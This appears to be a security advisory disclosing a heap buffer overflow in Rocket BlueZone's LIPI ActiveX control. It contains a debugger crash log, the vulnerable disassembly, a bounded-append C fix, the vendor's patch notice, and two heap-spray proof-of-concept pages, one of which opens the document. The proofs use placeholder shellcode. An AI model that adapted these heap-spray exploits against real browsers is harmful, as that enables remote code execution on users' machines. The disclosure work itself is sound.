<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<div id=blah></div>
<script>
        var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u0c0c%u0c0c");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x600; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
obj.UserName = "aaaaaaaa";
obj.Password = "bbbbbbbb";
bof = "";
for (i=0; i<15000; i++){
   bof = bof + "!!!!";
}
obj.SendFile(bof,"");
</script>

LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of the object's methods and properties, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX control exposes the ReceiveFile() method; see the typelib:

...
/* DISPID=1 */
	/* VT_I4 [3] */
	function ReceiveFile(
		/* VT_BSTR [8] [in] */ $__MIDL_0011,
		/* VT_BSTR [8] [in] */ $__MIDL_0012
		)
	{
		/* method ReceiveFile */
	}
...

This method suffers from a heap buffer overflow in the first argument because of a dangerous call to a strcat-like function inside bzlipiobj.dll; see the vulnerable code below.
Note that you need to set the ‘Username’ and ‘Password’ properties to avoid a login input box.
When browsing receivefile.html, WinDBG shows:

eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c
eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
<Unloaded_ring.dll>+0xc0c0bfb:
0c0c0c0c 0c0c            or      al,0Ch

Vulnerable code, bzlipiobj.dll:
 1001F94D  8D8510040000              		lea	eax,[ebp+00000410h]
 1001F953                           L1001F953:
 1001F953  50                        		push	eax
 1001F954  8D83E28E0800              		lea	eax,[ebx+00088EE2h]
 1001F95A  50                        		push	eax
 1001F95B  FF15F8610210              		call	[KERNEL32.dll!lstrcatA]
 1001F961  EB75                      		jmp	L1001F9D8
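
The lstrcatA calls in the SendFile and ReceiveFile disassembly above append a script-supplied string to a field inside a larger heap object without any length check. The following is an added example, not code from the advisory or from the vendor, showing a bounded append in portable C that rejects oversized input instead of writing past the field. The struct layout, the field size and the function names are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical layout: a fixed-size path field inside a larger heap object,
   followed by data that an overflow would corrupt. Sizes are assumptions. */
#define PATH_FIELD_SIZE 260
struct transfer_state {
    char path[PATH_FIELD_SIZE];   /* destination of the append */
    void (*on_done)(void);        /* adjacent field that must stay intact */
};

/* Bounded stand-in for an lstrcatA/strcat-style append.
   Returns 0 on success, -1 if dst is unterminated or src does not fit.
   On failure dst is left unchanged (no silent truncation). */
int append_checked(char *dst, size_t dst_size, const char *src)
{
    const char *end;
    size_t used, need;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    /* memchr, not strlen: never scan past the field looking for the NUL */
    end = memchr(dst, '\0', dst_size);
    if (end == NULL)
        return -1;
    used = (size_t)(end - dst);
    need = strlen(src);
    if (need >= dst_size - used)  /* need + terminating NUL must fit */
        return -1;
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* Build the path from a fixed prefix and a caller-supplied file name. */
int set_remote_file(struct transfer_state *st, const char *prefix, const char *name)
{
    st->path[0] = '\0';
    if (append_checked(st->path, sizeof st->path, prefix) != 0 ||
        append_checked(st->path, sizeof st->path, name) != 0) {
        st->path[0] = '\0';       /* reject the whole request */
        return -1;
    }
    return 0;
}

int main(void)
{
    struct transfer_state st = { "", NULL };
    return set_remote_file(&st, "C:\\in\\", "report.txt"); /* 0 = accepted */
}
```

A 60000-character argument, the length the proof-of-concept pages build, is refused by set_remote_file() and the adjacent on_done field is left untouched.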

Proof of Concept

<html>
<body>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<div id=blah></div>
<script>
        var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u0c0c%u0c0c");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x600; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
obj.UserName = "aaaaaaaa";
obj.Password = "bbbbbbbb";
bof = "";
for (i=0; i<15000; i++){
   bof = bof + "!!!!";
}
obj.ReceiveFile(bof,"");
</script>

Vendor Response
The vendor has responded that they have released a patch (2nd of September 2015) and commented that:

In addition to placing the BlueZone announcement on the Rocket Customer Portal, we have added the vulnerability announcement to our website.
You may find the information via this link on our BlueZone product page:
https://www.rocketsoftware.com/product-families/rocket-bluezone-passport
There is also a dedicated page for the announcement if someone does a search for it on the Rocket website:
https://www.rocketsoftware.com/rocket-bluezone-security-annoucement
The patch location is within Rocket’s Customer Portal, and is accessible by all affected customers.
Thanks again for your help and your notification to us.
